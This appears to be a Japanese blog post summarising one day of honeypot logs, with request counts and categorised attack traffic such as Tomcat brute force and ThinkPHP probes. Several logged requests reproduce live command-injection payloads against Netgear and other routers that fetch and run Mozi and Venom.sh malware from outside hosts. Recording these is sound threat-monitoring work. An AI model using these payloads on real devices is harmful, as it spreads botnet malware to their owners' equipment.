23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(284日目)

2019/12/25(水)

トータルは8518件でした。

ハンティングログは以下です。

110.153.76[.]39 wget+hxxp[:]//172.36.29[.]223:38482/Mozi.m

www.virustotal.com

197.58.253[.]66 wget hxxp[:]//185.132.53[.]119/Venom.sh

www.virustotal.com
www.virustotal.com

175.4.210[.]121 wget+hxxp[:]//192.168.1[.]1:8088/Mozi.m

www.virustotal.com

件数 概要 リクエス
8457 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
33 アクセス GET /
3 DVR/NVR/IPC のAPIにおける脆弱性を狙った通信 POST /editBlackAndWhiteList
2 不正中継の調査 GET hxxp[:]//baidu.com/robots.txt
2 Tomcatの調査 GET /manager/text/list
2 ThinkPHPの脆弱性を狙った通信ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php
1 ThinkPHPの脆弱性を狙った通信 POST /TP/public/index.php?s=captcha
1 不正中継の調査 HEAD hxxp[:]//123.125.114.144/
1 不明 HEAD /esps/
1 不正中継の調査 GET hxxp[:]//www.123cha.com/
1 DGN1000 Netgear ルータを狙うMirai亜種の攻撃 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+hxxp[:]//192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1
1 DGN1000 Netgear ルータを狙うMirai亜種の攻撃 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+hxxp[:]//172.36.29.223:38482/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1
1 ZmEUによるphpMyAdminのスキャン GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 ZmEUによるphpMyAdminのスキャン GET /pma/scripts/setup.php
1 ZmEUによるphpMyAdminのスキャン GET /phpmyadmin/scripts/setup.php
1 ZmEUによるphpMyAdminのスキャン GET /phpMyAdmin/scripts/setup.php
1 ZmEUによるphpMyAdminのスキャン GET /myadmin/scripts/setup.php
1 ZmEUによるphpMyAdminのスキャン GET /MyAdmin/scripts/setup.php
1 ルーター脆弱性を狙った通信 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp[:]//185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$
1 調査 GET /index.html
1 Webshell設置の調査 GET /external.php
1 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
1 不正中継の試み CONNECT www.ipip.net:443
1 不正中継の試み CONNECT www.baidu.com:443
1 不正中継の試み CONNECT cn.bing.com:443